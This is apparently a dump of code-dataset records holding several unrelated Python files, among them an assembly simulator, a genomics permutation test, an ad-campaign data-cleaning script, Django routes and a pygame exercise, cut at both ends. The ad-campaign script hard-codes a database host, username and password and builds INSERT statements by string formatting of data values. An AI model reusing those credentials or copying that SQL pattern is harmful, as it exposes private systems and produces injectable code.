(reg['111'][-1] == '1'):\r\n return l[8:]\r\n return convert(int(pc, 2) + 1)\r\n\r\n\r\ndef halt(pc):\r\n RF_dump()\r\n print()\r\n return pc\r\n\r\ndef PC_dump(pc):\r\n print(pc,end=\" \")\r\n\r\n\r\ndef MEM_DUMP():\r\n for i in MEM.keys():\r\n print(MEM[i])\r\n\r\n\r\ndef 
RF_dump():\r\n for i in reg.keys():\r\n print(reg[i],end=\" \")\r\n print()\r\n\r\ndef M(pc):\r\n c=0\r\n while(1):\r\n X.append(c)\r\n Y.append(int(pc, 2))\r\n c=c+1\r\n PC_dump(pc)\r\n if(pc==convert(len(statements)-1)):\r\n RF_dump()\r\n break\r\n if (statements[pc][0:5] == \"00000\"):\r\n pc=add(statements[pc],pc)\r\n elif (statements[pc][0:5] == \"00001\"):\r\n pc=sub(statements[pc],pc)\r\n elif (statements[pc][0:5] == \"00010\"):\r\n pc=mov1(statements[pc],pc)\r\n elif (statements[pc][0:5] == \"00011\"):\r\n pc=mov2(statements[pc],pc)\r\n elif (statements[pc][0:5] == \"00100\"):\r\n pc=load(statements[pc],pc)\r\n elif (statements[pc][0:5] == \"00101\"):\r\n pc=store(statements[pc],pc)\r\n elif (statements[pc][0:5] == \"00110\"):\r\n pc=mul(statements[pc],pc)\r\n elif (statements[pc][0:5] == \"00111\"):\r\n pc=div(statements[pc],pc)\r\n elif (statements[pc][0:5] == \"01000\"):\r\n pc=right_shift(statements[pc],pc)\r\n elif (statements[pc][0:5] == \"01001\"):\r\n pc=left_shift(statements[pc],pc)\r\n elif (statements[pc][0:5] == \"01010\"):\r\n pc=xor_fnc(statements[pc],pc)\r\n elif (statements[pc][0:5] == \"01011\"):\r\n pc=or_fnc(statements[pc],pc)\r\n elif (statements[pc][0:5] == \"01100\"):\r\n pc=and_fnc(statements[pc],pc)\r\n elif (statements[pc][0:5] == \"01101\"):\r\n pc=not_fnc(statements[pc],pc)\r\n elif (statements[pc][0:5] == \"01110\"):\r\n pc=compare(statements[pc],pc)\r\n elif (statements[pc][0:5] == \"01111\"):\r\n pc=jump_uncond(statements[pc],pc)\r\n elif (statements[pc][0:5] == \"10000\"):\r\n pc=jump_if_less(statements[pc],pc)\r\n reg[\"111\"] = \"0000000000000000\"\r\n elif (statements[pc][0:5] == \"10001\"):\r\n pc=jump_if_greater(statements[pc],pc)\r\n reg[\"111\"] = \"0000000000000000\"\r\n elif (statements[pc][0:5] == \"10010\"):\r\n pc=jump_if_equal(statements[pc],pc)\r\n reg[\"111\"] = \"0000000000000000\"\r\n elif (statements[pc][0:5] == \"10011\"):\r\n pc=halt(pc)\r\n RF_dump()\r\n break\r\n RF_dump()\r\n MEM_DUMP()\r\nM(pc)\r\nPd()\r\n","sub_path":"CO_M21_Assignment-main/SimpleSimulator/simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":7985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"517486902","text":"#NOTE: some code is duplicated from get_peak_distribution_in_tads.py;\n#Best to remove this duplication in the future\n\nimport argparse\nimport random\n\ndef parse_args():\n parser=argparse.ArgumentParser(description=\"Perform a sampling test to check if any TAD's are enriched\")\n parser.add_argument(\"--peaks\")\n parser.add_argument(\"--num_to_sample\",type=int)\n parser.add_argument(\"--tads\")\n parser.add_argument(\"--outf\")\n parser.add_argument(\"--binsize\",type=int,default=5000)\n parser.add_argument(\"--num_samples\",type=int,default=10000)\n return parser.parse_args()\n\ndef main():\n args=parse_args()\n tads=open(args.tads,'r').read().strip().split('\\n')\n peaks=open(args.peaks,'r').read().strip().split('\\n')\n binsize=args.binsize\n num_to_sample=args.num_to_sample\n num_samples=args.num_samples\n \n tad_dict=dict()\n tad_distribution=dict()\n for tad in tads:\n tokens=tad.split('\\t')\n chrom=tokens[0]\n startval=int(tokens[1])\n endval=int(tokens[2])\n if chrom not in tad_dict:\n tad_dict[chrom]=dict()\n tad_distribution[chrom]=dict() \n tad_dict[chrom][startval]=endval\n tad_distribution[chrom][startval]=[0]*num_samples \n print(\"generated tad dictionary\")\n\n cur_sample=0\n num_peaks=len(peaks)\n print(str(num_peaks))\n print(str(num_to_sample))\n 
while cur_sample < num_samples:\n #sample randomly from the peak set\n subset_indices=random.sample(range(num_peaks),num_to_sample)\n peak_subset=[peaks[i] for i in subset_indices]\n for peak in peak_subset:\n tokens=peak.split('\\t')\n chrom=tokens[0]\n if chrom not in tad_dict:\n continue\n startval=int(tokens[1])\n endval=int(tokens[2])\n if chrom in tad_dict:\n for tad_start in tad_dict[chrom]:\n if tad_start <= startval:\n tad_end=tad_dict[chrom][tad_start]\n if tad_end >= endval:\n #we have a hit!\n tad_distribution[chrom][tad_start][cur_sample]+=1\n cur_sample+=1\n print(str(cur_sample))\n\n outf=open(args.outf,'w')\n outf_mean=open(args.outf+'.mean','w')\n for chrom in tad_distribution:\n for startval in tad_distribution[chrom]:\n outf.write(chrom+'\\t'+str(startval)+'\\t'+str(tad_dict[chrom][startval])+'\\t'+'\\t'.join([str(i) for i in tad_distribution[chrom][startval]])+'\\n')\n #get the mean value for each tad\n outf_mean.write(chrom+'\\t'+str(startval)+'\\t'+str(tad_dict[chrom][startval])+'\\t'+str(sum(tad_distribution[chrom][startval])*1.0/num_samples)+'\\n')\n \nif __name__==\"__main__\":\n main()\n","sub_path":"check_tad_enrichment/perform_permutation_test.py","file_name":"perform_permutation_test.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"632810231","text":"# 将广告campaign历史数据导入 ad_campaigns 表格中\r\n\r\nfrom pandas import DataFrame, Series\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nfrom dateutil.parser import parse\r\nimport psycopg2\r\nimport re, sys, time\r\n\r\n####################################################\r\n########## 市场广告投放的campaign历史数据 #############\r\n####################################################\r\n\r\ndf_ad = pd.read_csv(r'C:\\Users\\luyaxin\\Desktop\\工作文件夹\\广告campaign历史数据\\ai_public_ads.csv',\r\n names=['id', 'campaign_id', 'campaign_name', 'adset_id', 'adset_name',\r\n 'adset_optimization_goal', 'adset_bid_amount', 'adset_billing_event',\r\n 'adset_daily_budget', 'adset_promoted_object_url', 'adset_promoted_object_id',\r\n 'adset_targeting_flexible_spec_id', 'adset_targeting_user_device',\r\n 'adset_targeting_publisher_platforms', 'adset_targeting_geo_locations_countries',\r\n 'adset_targeting_geo_locations_types', 'adset_targeting_age_max',\r\n 'adset_targeting_age_min', 'adset_targeting_excluded_custom_audiences',\r\n 'adset_targeting_custom_audiences', 'adset_targeting_app_install_state',\r\n 'adset_targeting_excluded_connections', 'adset_targeting_device_platform',\r\n 'adset_targeting_user_os', 'adset_targeting_facebook_positions',\r\n 'adset_targeting_genders', 'ad_id', 'ad_name', 'ad_creative_id',\r\n 'created_by', 'status'])\r\n\r\ndf_ad.adset_targeting_genders.value_counts() # 性别分布\r\ndf_ad.adset_targeting_genders.isnull().value_counts() # 性别为Null的数量\r\n\r\ndf_ad.adset_targeting_geo_locations_countries.value_counts() # 目标国家分布\r\ndf_ad.adset_targeting_geo_locations_countries.isnull().value_counts() # 目标国家字段有未解析出的情况\r\ndf_ad.adset_targeting_publisher_platforms.value_counts()\r\n\r\ndf_ad.adset_targeting_device_platform.value_counts() \r\ndf_ad.adset_targeting_facebook_positions.value_counts()\r\ndf_ad.adset_targeting_user_os.value_counts() \r\n\r\n\r\n##################################################\r\n################ 清洗数据 #########################\r\n##################################################\r\n\r\n# 从campaign_name中解析出广告投放的日期\r\ndef parse_campaign_date(campaign_str):\r\n \"\"\"\r\n 
从'campagin_name'字段解析出广告投放的起始日期,并统一格式\r\n 日期形如 20150803, 2015-09-29, 2016-0623, 2015-4-24, 7/11, 7/3\r\n \"\"\"\r\n mobj = re.search(re.compile(\"((2014|2015|2016)(\\d|-|\\/)+(\\d|-|\\/)[0-3]+\\d)|(\\s*\\d{1,2}\\/\\d{1,2}\\s*)\"), campaign_str)\r\n try:\r\n date_str = mobj.group().strip()\r\n if (len(date_str) <= 5) and ('/' in date_str):\r\n date_str = '2015/' + date_str\r\n \r\n elif date_str.count('-') == 1: # 处理形如'2015-0623'的日期格式\r\n day_str = date_str[-2:]\r\n date_str = date_str.replace(day_str, '-' + day_str) # str.replace不是inplace\r\n \r\n date_obj = parse(date_str)\r\n return date_obj.strftime('%Y-%m-%d')\r\n \r\n except:\r\n return 'Not Specified'\r\n\r\ndf_ad['md_campaign_date'] = df_ad['campaign_name'].apply(parse_campaign_date)\r\n#df_ad['md_campagin_date'].isnull().value_counts()\r\n\r\n# 从ad_name中解析出单个广告元素\r\ndef parse_ad_content_elements(ad_elements_str):\r\n \"\"\"\r\n 从包含广告元素的字符串'ad_name'中解析出单个广告元素 (两种加号:+, +)\r\n \"\"\"\r\n ad_elements_str = re.sub(re.compile(\"((2014|2015|2016)(\\d|-|\\/)+(\\d|-|\\/)[0-3]+\\d)|(\\s*\\d{1,2}\\/\\d{1,2}\\s*)\"), '', ad_elements_str).strip()\r\n ad_elements_str = re.sub(re.compile(\"\\+|\\+|_|-|\\s|\\.\"), '', ad_elements_str)\r\n ad_elements_list = ad_elements_str.split('')\r\n for ad_element in ad_elements_list:\r\n if not ad_element:\r\n ad_elements_list.remove(ad_element)\r\n return str(ad_elements_list).replace(\"'\", \"\")[1: -1] # 去除单引号和中括号\r\n\r\ndf_ad['md_ad_elements'] = df_ad['ad_name'].apply(parse_ad_content_elements)\r\n#DataFrame(df_ad.ix[:, ['ad_name', 'ad_elements']]).to_excel(r'C:\\Users\\m7catsue\\Desktop\\ad_elements.xls')\r\n\r\n# 从campaign_name中填补目标性别,重新标记目标性别选项为male, female, all\r\n#df_ad.adset_targeting_genders.value_counts()\r\n#df_ad.adset_targeting_genders.isnull().value_counts()\r\n\r\ndef parse_targeting_genders(row):\r\n \"\"\"\r\n Row function: 重新标记广告目标性别,并填补性别的缺失值\r\n \"\"\"\r\n if row['adset_targeting_genders'] == '[1]': \r\n return 'male'\r\n if row['adset_targeting_genders'] == '[2]': \r\n return 'female'\r\n else:\r\n mobj = re.search(re.compile(\"\\s(M|F)\\s\"), row['adset_name'])\r\n try:\r\n gender = mobj.group().strip()\r\n if gender == 'M': return 'male'\r\n if gender == 'F': return 'female'\r\n except AttributeError:\r\n return 'all'\r\n \r\ndf_ad['md_targeting_genders'] = df_ad.apply(parse_targeting_genders, axis=1) # 对df的每一行apply函数\r\n#df_ad['md_targeting_genders'].value_counts()\r\n\r\n\r\n# 填补缺失的国家代码\r\ndef parse_targeting_countries(row):\r\n \"\"\"\r\n Row function:填补国家代码的缺失值,在新一列重新标记\r\n \"\"\"\r\n if not row['adset_targeting_geo_locations_countries'] is np.nan:\r\n return row['adset_targeting_geo_locations_countries']\r\n else:\r\n mobj = re.match(\"([A-Z]{2}\\s)|(([A-Z]{2}\\+)+[A-Z]{2}\\s)\", row['adset_name'])\r\n try:\r\n country_code = mobj.group().strip()\r\n return country_code\r\n except AttributeError:\r\n if ('伊斯坦布尔' in row['adset_name']) or ('安卡拉' in row['adset_name']):\r\n return 'TR'\r\n if '加州' in row['adset_name']:\r\n return 'US'\r\n else:\r\n return 'ROW'\r\n \r\ndf_ad['md_targeting_countries'] = df_ad.apply(parse_targeting_countries, axis=1)\r\n#df_country.country.value_counts()\r\n\r\n\r\n# 从adset_name中解析出目标人群兴趣\r\n#adset_name_series = Series(df_ad['adset_name'].unique())\r\n#DataFrame(adset_name_series).to_excel(r'C:\\Users\\m7catsue\\Desktop\\adset_name.xls')\r\n\r\ndef parse_targeting_interests(adset_name_str):\r\n \"\"\"\r\n 从adset_name中解析出广告投放的目标人群的兴趣\r\n \"\"\"\r\n adset_name_str = adset_name_str + ' '\r\n \r\n if 
re.search(re.compile(\"(INT\\s+?\\d{2}-\\d{2}\\s+?.+)|(INT\\s+?.+?\\s+?)\"), adset_name_str):\r\n target_str = re.search(re.compile(\"(INT\\s+?\\d{2}-\\d{2}\\s+?.+)|(INT\\s+?.+?\\s+?)\"), adset_name_str).group().strip()\r\n target_str = re.sub(re.compile(\"INT|\\s|\\d|-\"), '', target_str).strip()\r\n #print('1')\r\n if target_str: return target_str\r\n else: return 'Not Specified'\r\n \r\n elif re.search(re.compile(\"\\d{2}-\\d{2}\\+*\\s+(?!.*(LAL|IND|OCPM|Lookalike|google|GOOGLE|谷歌|\\.|安卓|OVERALL|付费|安装|月|EN)).+$\"), adset_name_str):\r\n target_str = re.search(re.compile(\"\\d{2}-\\d{2}\\+*\\s+(?!.*(LAL|IND|OCPM|Lookalike|google|\\.|安卓|OVERALL|付费|安装|月|EN)).+$\"), adset_name_str).group().strip()\r\n target_str = re.sub(re.compile(\"(\\d{2}-\\d{2}\\+*\\s+)|-|\\d|\\(|\\)|\\%\"), '', target_str).strip()\r\n #print('2')\r\n if target_str: return target_str\r\n else: return 'Not Specified'\r\n \r\n elif re.search(re.compile(\"兴趣定向\\(.+\\)\"), adset_name_str):\r\n target_str = re.search(re.compile(\"兴趣定向\\(.+\\)\"), adset_name_str).group().strip()\r\n target_str = re.sub(re.compile(\"兴趣定向|\\(|\\)\"), '', target_str).strip()\r\n #print('3')\r\n if target_str: return target_str\r\n else: return 'Not Specified'\r\n \r\n elif re.search(re.compile(\"\\:.+?(,|\\s)\"), adset_name_str):\r\n target_str = re.search(re.compile(\"\\:.+?(,|\\s)\"), adset_name_str).group().strip()\r\n target_str = re.sub(re.compile(\"\\:|,|\\s\"), '', target_str).strip()\r\n #print('4')\r\n if target_str: return target_str\r\n else: return 'Not Specified'\r\n \r\n elif re.search(re.compile(\"\\%\\s+.+\\s+\\d{2}-\\d{2}\"), adset_name_str):\r\n target_str = re.search(re.compile(\"\\%\\s+.+\\s+\\d{2}-\\d{2}\"), adset_name_str).group().strip()\r\n target_str = re.sub(re.compile(\"\\%|\\s|\\d|\\-\"), '', target_str).strip()\r\n #print('5')\r\n if target_str: return target_str\r\n else: return 'Not Specified'\r\n \r\n elif re.search(re.compile(\"[A-Z]+\\s{1,2}\\w{2,99}?\\s+\\d{2}-\"), adset_name_str):\r\n target_str = re.search(re.compile(\"\\w+\\s{1,2}\\w{2,99}?\\s+\\d{2}-\"), adset_name_str).group().strip()\r\n target_str = re.sub(re.compile(\"[A-Z]|\\s|\\d|-\"), '', target_str).strip()\r\n #print('6')\r\n if target_str: return target_str\r\n else: return 'Not Specified'\r\n \r\n elif not re.search(re.compile(\"LAL|lookalike|INT|IND|google|登录|付费|安卓|iOS|月|And|OVERALL|Purchase|(\\d{2}-\\d{2}\\+*)|\\d*\\%\\d*|OCPM|\\s{1,2}M\\s{1,2}|-\"), adset_name_str):\r\n return adset_name_str.strip()\r\n \r\n else:\r\n return 'Not Specified'\r\n\r\ndf_ad['md_targeting_interests'] = df_ad['adset_name'].apply(parse_targeting_interests)\r\n#len(df_ad['md_targeting_interests'].unique())\r\n#df_ad['md_targeting_interests'].value_counts()\r\n\r\n\r\n# 从'campaign_name'解析出投放广告时定位目标受众的方式:LAL or INT (在parse_targeting_interests函数之后使用)\r\n# OCPM:按展示付费; CPA:按下载付费 \r\n# LAL:根据种子用户进行相似性人群定位; iNT按照人群的兴趣定位\r\n#df_ad.ix[:, ['campaign_name', 'adset_name', 'ad_name']].to_excel(r'C:\\Users\\luyaxin\\Desktop\\df_temp.xls')\r\n\r\ndef parse_ad_targeting_method(row):\r\n \"\"\"\r\n Row function: 从'campaign_name'解析出投放广告时定位目标受众的方式:LAL or INT;\r\n 在parse_targeting_interests函数之后使用\r\n \"\"\"\r\n mobj = re.search(re.compile(\"LAL|INT|looklike|lookalike|Lookalike|兴趣|游戏定向\"), row['campaign_name'])\r\n if not mobj:\r\n if row['md_targeting_interests'] != 'Not Specified':\r\n return 'Interest_based'\r\n else:\r\n return 'Not Specified'\r\n else:\r\n target_str = mobj.group().strip()\r\n if re.match(re.compile(\"INT|兴趣|游戏定向\"), target_str):\r\n return 'Interest_based'\r\n if 
re.match(re.compile(\"LAL|looklike|lookalike|Lookalike\"), target_str):\r\n return 'Look-alike'\r\n\r\ndf_ad['md_ad_targeting_method'] = df_ad.apply(parse_ad_targeting_method, axis=1)\r\n#df_ad['ad_targeting_method'].value_counts()\r\n\r\n\r\n# 解析广告目标的OS类型\r\ndef parse_os_type(os_version_str):\r\n \"\"\"\r\n 返回广告目标的OS类型\r\n \"\"\"\r\n if os_version_str is np.nan:\r\n os_version_str = 'Not Specified'\r\n elif 'ios' in os_version_str.lower(): \r\n return 'IOS'\r\n elif 'android' in os_version_str.lower(): \r\n return 'ANDROID'\r\n else:\r\n return 'Not Specified'\r\n\r\ndf_ad['md_os_type'] = df_ad['adset_targeting_user_os'].apply(parse_os_type)\r\n#df_ad['md_os_type'].value_counts()\r\n\r\n# 清理字段前后的中括号、单引号和'u'\r\ndef clean_column_field(column_str):\r\n \"\"\"清理字段前后的中括号、单引号和'u'; 适用于:\r\n adset_targeting_device_platform, \r\n adset_targeting_user_os, \r\n adset_targeting_facebook_positions\r\n \"\"\"\r\n if column_str is np.nan:\r\n return 'Not Specified'\r\n\r\n column_str_list = str(column_str)[1:-1].split(',')\r\n temp_list = []\r\n for item in column_str_list:\r\n new_item = re.sub(re.compile(\"u|\\'\"), '', item).strip()\r\n temp_list.append(new_item)\r\n return ','.join(temp_list).replace('.', '_')\r\n\r\ndf_ad['md_targeting_device_platform'] = df_ad['adset_targeting_device_platform'].apply(clean_column_field) # mobile or desktop\r\ndf_ad['md_targeting_user_os_version'] = df_ad['adset_targeting_user_os'].apply(clean_column_field) # OS and version\r\ndf_ad['md_targeting_facebook_positions'] = df_ad['adset_targeting_facebook_positions'].apply(clean_column_field) # 'feed'; 'right_hand_column'\r\n\r\n\r\n\r\n# 对清洗之后的df_ad选择所需要的column和顺序\r\ndf_ad.fillna('Not Specified', inplace=True)\r\n\r\ndf_ad_rc = df_ad.ix[:, ['campaign_id', 'campaign_name', 'adset_id', 'adset_name', 'ad_id', 'ad_name',\r\n 'adset_targeting_user_device', 'adset_targeting_publisher_platforms',\r\n 'adset_targeting_geo_locations_types', 'adset_targeting_age_max', 'adset_targeting_age_min',\r\n 'md_campaign_date', 'md_targeting_genders', 'md_targeting_countries',\r\n 'md_ad_elements', 'md_targeting_interests', 'md_targeting_device_platform',\r\n 'md_os_type', 'md_targeting_user_os_version', 'md_targeting_facebook_positions',\r\n 'md_ad_targeting_method']]\r\n \r\ndf_ad_rc.rename(columns={'adset_targeting_user_device': 'targeting_user_device',\r\n 'adset_targeting_publisher_platforms': 'targeting_publisher_platforms',\r\n 'adset_targeting_geo_locations_types': 'targeting_geo_locations_types',\r\n 'adset_targeting_age_max': 'age_max', 'adset_targeting_age_min': 'age_min',\r\n 'md_campaign_date': 'campaign_date', 'md_targeting_genders': 'targeting_genders',\r\n 'md_targeting_countries': 'targeting_countries', 'md_ad_elements': 'ad_elements',\r\n 'md_targeting_interests': 'targeting_interests', \r\n 'md_targeting_device_platform': 'targeting_device_platform',\r\n 'md_os_type': 'os_type', 'md_targeting_user_os_version': 'targeting_user_os_version',\r\n 'md_targeting_facebook_positions': 'targeting_facebook_positions',\r\n 'md_ad_targeting_method': 'ad_targeting_method'}, inplace=True)\r\n\r\n\r\n########################################################\r\n#################### 写入数据库 #########################\r\n#######################################################\r\n\r\n# 所有字段都是字符串\r\npg_create_table_ad_campaigns = \"\"\"\r\nCREATE TABLE public.ad_campaigns(\r\n campaign_id CHARACTER VARYING(255) NOT NULL,\r\n campaign_name CHARACTER VARYING(255) NOT NULL,\r\n adset_id CHARACTER VARYING(255) NOT NULL,\r\n adset_name CHARACTER 
VARYING(255) NOT NULL,\r\n ad_id CHARACTER VARYING(255) NOT NULL,\r\n ad_name CHARACTER VARYING(255) NOT NULL,\r\n targeting_user_device CHARACTER VARYING(255) NOT NULL,\r\n targeting_publisher_platforms CHARACTER VARYING(255) NOT NULL,\r\n targeting_geo_locations_types CHARACTER VARYING(255) NOT NULL,\r\n age_max CHARACTER VARYING(255) NOT NULL,\r\n age_min CHARACTER VARYING(255) NOT NULL,\r\n campaign_date CHARACTER VARYING(255) NOT NULL,\r\n targeting_genders CHARACTER VARYING(255) NOT NULL,\r\n targeting_countries CHARACTER VARYING(255) NOT NULL,\r\n ad_elements CHARACTER VARYING(255) NOT NULL,\r\n targeting_interests CHARACTER VARYING(255) NOT NULL,\r\n targeting_device_platform CHARACTER VARYING(255) NOT NULL,\r\n os_type CHARACTER VARYING(255) NOT NULL,\r\n targeting_user_os_version CHARACTER VARYING(255) NOT NULL,\r\n targeting_facebook_positions CHARACTER VARYING(255) NOT NULL,\r\n ad_targeting_method CHARACTER VARYING(255) NOT NULL\r\n);\r\n\"\"\"\r\n\r\nconn = psycopg2.connect(\r\n host=\"52.34.85.153\",\r\n user='luyaxin',\r\n port='5439',\r\n password='Lyx12347',\r\n dbname='rowyy')\r\ncur = conn.cursor()\r\n\r\n#cur.execute(\"SET CLIENT_ENCODING TO 'UTF8';\")\r\n#conn.commit()\r\n\r\n# create table 'ad_campaigns'\r\ncur.execute(pg_create_table_ad_campaigns) \r\nconn.commit()\r\n\r\ncur.execute(\"TRUNCATE TABLE public.ad_campaigns\")\r\nconn.commit()\r\n\r\ndef insert_df_as_dict(dataframe):\r\n \"\"\"\r\n 将广告campaign数据写入pg数据库\r\n \"\"\"\r\n start = time.clock()\r\n column_names = dataframe.columns\r\n insert_count, error_count = 0, 0\r\n for row_array in dataframe.values:\r\n insert_dict = dict(zip(column_names, row_array))\r\n #print(insert_dict)\r\n try:\r\n cur.execute(\r\n \"\"\"INSERT INTO public.ad_campaigns (%s) VALUES (%s)\"\"\"\r\n % (','.join(insert_dict), ','.join(\"'%s'\" % insert_dict[key] for key in insert_dict)) # IMP单引号\r\n )\r\n conn.commit()\r\n insert_count += 1\r\n except:\r\n error_count += 1\r\n print('Error:\\n', sys.exc_info())\r\n continue\r\n \r\n time_elapsed = time.clock() - start\r\n print('All data inserted into database.\\nNumber of rows inserted: %s\\nNumber of errors: %s' \r\n % (insert_count, error_count))\r\n print('Time elapsed: %.3f' % time_elapsed)\r\n\r\n\r\n# Insert data into postgresqlDB\r\ninsert_df_as_dict(df_ad_rc)\r\n\r\n# 关闭数据库连接\r\ncur.close()\r\nconn.close()\r\n\r\n\r\n","sub_path":"T4F_User_Profiles/ad_campaign_preprocessing_m7.py","file_name":"ad_campaign_preprocessing_m7.py","file_ext":"py","file_size_in_byte":17184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"101536289","text":"import sys\n\nn, k = map(int, sys.stdin.readline().split())\np = sys.stdin.readline().strip()\n\nvisited = set()\nperson = []\n\nfor i, x in enumerate(p):\n if x == \"P\":\n person.append(i)\n\nfor i in range(len(person)):\n idx = person[i]\n for j in range(idx-k, idx+k+1):\n if 0<=j\\d+)/$',\n profile.profile_add_game, name='profile-add-game'),\n url(r'^profile/remove-game/name=(?P\\d+)/$',\n profile.profile_remove_game, name='profile-remove-game'),\n url(r'^profile/add-guild/name=(?P\\d+)/$',\n profile.profile_add_guild, name='profile-add-guild'),\n url(r'^profile/remove-guild/name=(?P\\d+)/$',\n profile.profile_remove_guild, name='profile-remove-guild'),\n]\n\n## EVENTS\n## THESE WILL BE IMPLEMENTED ON A PROJECT LEVEL FOR NOW\n# urlpatterns += [\n# url(r'^events/view/all/$', events.all_events, name='all-events'),\n# url(r'^events/view/(?P\\d+)/$', events.view_event, name='view-event'),\n# 
url(r'^events/modify/(?P\\d+)/$', events.modify_event, name='modify-event'),\n# url(r'^events/delete/(?P\\d+)/$', events.delete_event, name='delete-event'),\n# url(r'^events/create/$', events.create_event, name='create-event'),\n# ]\n\n# MISC\nurlpatterns += [\n url(r'^no-permissions/$', base.no_permissions, name='no_permissions'),\n]\n","sub_path":"app/core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"341755263","text":"from getch import getch\n\nwhile True:\n try:\n c = getch()\n x = bytes(c,'utf-8')\n if chr(3) == c:\n break\n print(c,flush=True, end='' if chr(13) != c else '\\n')\n except Exception as e:\n print(f'{repr(e)} : Running in Thonny?')\n","sub_path":"PiBotXBeeExperiments/KeyboardExample.py","file_name":"KeyboardExample.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"424467660","text":"#Alex Ladin\r\n#10/15/21\r\n#Learning diplay,\r\n#opening windows,\r\n#changing size window,\r\n#basic game loop\r\n\r\nimport pygame, random\r\n\r\nfrom pygame.draw import circle\r\n#first thing to do is to intialize pygame\r\npygame.init()\r\ncheck= True \r\nheight=600\r\nwidth=700\r\ncolors= {'black':(0,0,0), 'red':(225,0,0), 'green':(0,225,0), 'blue':(0,0,225), 'white':(225,225,225), 'purple':(150,0,150), 'pink':(400,225,225), 'light blue':(225,225,400), 'light green':(225,0,225)}\r\nColorList= ['black', 'red', 'green', 'blue', 'white','purple', 'pink', 'light blue', 'light green']\r\nrandColor=random.choice(ColorList)\r\nwhile check:\r\n #height=input(\"height of the window: (100-1000)\")\r\n #width=input(\"Width of your window: (100-1000)\")\r\n \r\n try:\r\n height=int(height)\r\n width=int(width)\r\n check= False\r\n except ValueError:\r\n check= False\r\ncolor= randColor\r\nwindow=pygame.display.set_mode((width,height)) #set up color \r\n# window.fill(color)\r\npygame.display.flip() #refresh window with new color \r\n#change title of your window \r\npygame.display.set_caption(\"Alex's Window\")\r\npygame.display.flip()\r\nhbox=50\r\nwbox=50\r\nspeed=5\r\nxc=random.randint(25,500)\r\nyc=random.randint(25,400)\r\nradius=hbox/2\r\n#ball=pygame.circle(x=width/2, y=width/2)\r\nrect=pygame.Rect(width/2, height/2, wbox, hbox )\r\npygame.draw.rect(window, color, rect)\r\n#pygame.draw.circle(window ,color.get('green'),rect)\r\npygame.draw.circle(window, colors.get('green'), (xc,yc), radius)\r\n\r\n\r\npygame.display.flip()\r\nrun=True\r\n\r\n#main loop for the game:\r\nwhile run:\r\n pygame.time.delay(100)\r\n for case in pygame.event.get():\r\n if case.type == pygame.QUIT:\r\n run= False\r\n #how to get the position of the mouse\r\n # x,y=pygame.mouse.get_pos()\r\n #print(\"(\"+str(x)+\",\"+str(y)+\")\")\r\n keyPressed= pygame.key.get_pressed()\r\n if keyPressed[pygame.K_UP]:\r\n rect.y -= speed\r\n if rect.y<0:\r\n rect.y=height\r\n if keyPressed[pygame.K_DOWN]:\r\n rect.y += speed\r\n if rect.y>height:\r\n rect.y=0\r\n if keyPressed[pygame.K_LEFT]:\r\n rect.x -= speed\r\n if rect.x<1:\r\n rect.x=width-wbox/2\r\n if keyPressed[pygame.K_RIGHT]:\r\n rect.x += speed\r\n if rect.x>width:\r\n rect.x=width-wbox/2\r\n if keyPressed[pygame.K_w]:\r\n yc -= speed\r\n if yc<0:\r\n yc=wbox\r\n if keyPressed[pygame.K_s]:\r\n yc += speed\r\n if yc> height:\r\n yc=height-wbox\r\n if keyPressed[pygame.K_a]:\r\n xc -= speed\r\n if xc<1:\r\n xc=wbox/2\r\n if 
keyPressed[pygame.K_d]:\r\n xc += speed\r\n print(\"xc= \", xc)\r\n if xc>(width-wbox):\r\n xc=width\r\n\r\n\r\n\r\n window.fill(color)\r\n pygame.display.flip()\r\n pygame.draw.rect(window, 'green', rect)\r\n pygame.draw.circle(window, colors.get('green'), (xc,yc), radius)\r\n pygame.display.flip()\r\n\r\n point =(xc, yc) \r\n collide=pygame.Rect.collidepoint(rect,point)\r\n #collide function\r\n if collide:\r\n radius += wbox/2\r\n rect.x=random.randrange(25,width)\r\n rect.y=random.randrange(25,height)\r\n \r\n pygame.draw.rect(window, colors.get('purple'), rect)\r\n pygame.draw.circle(window, colors.get('blue'), (point), radius)\r\n pygame.display.flip() \r\n if radius >= height/2:\r\n run=False\r\n \r\n\r\n\r\n\r\n\r\npygame.quit()\r\n","sub_path":"learningPygame3.py","file_name":"learningPygame3.py","file_ext":"py","file_size_in_byte":3365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"17795219","text":"import panel_driver\nfrom threading import Thread\nfrom threading import Lock\nimport time\n\n\nclass Panel:\n\tdef __init__(self):\n\t\tself.button_list = []\n\t\tself.mutex_key = Lock()\n\t\tself.thread_started = False\n\t\tself.polling_thread = Thread(target = self.polling_buttons, args = (),)\n\n\tdef polling_buttons(self):\n\t\told_button = -1\n\t\tself.thread_started = True\n\t\twhile True:\n\t\t\tbutton = panel_driver.read_buttons()\n\t\t\tif button >= 0 and button != old_button:\n\t\t\t\tself.mutex_key.acquire()\n\t\t\t\tself.button_list.append(button)\t\n\t\t\t\tself.mutex_key.release()\n\t\t\t\tprint (self.button_list)\n\t\t\t\told_button = button\t\n\n\t#polling_thread = Thread(target = polling_buttons, args = (),)\n\n\tdef read_pressed_button(self):\n\t\tif self.thread_started is not True:\n\t\t\tself.start(self.polling_thread)\n\t\tif self.button_list:\n\t\t\tself.mutex_key.acquire()\n\t\t\tfirst_element = self.button_list.pop(0)\n\t\t\tself.mutex_key.release()\n\t\t\t#print first_element\n\t\t\treturn first_element\n\t\treturn 'no buttons pressed'\t\n\t\t\n\tdef start(self,thread):\n\t\tthread.daemon = True # Terminate thread when \"main\" is finished\n\t\tthread.start()\n\t\t#thread.join()\n\n","sub_path":"class_panel.py","file_name":"class_panel.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"592921942","text":"import frame\nimport FDB\n\nframes = 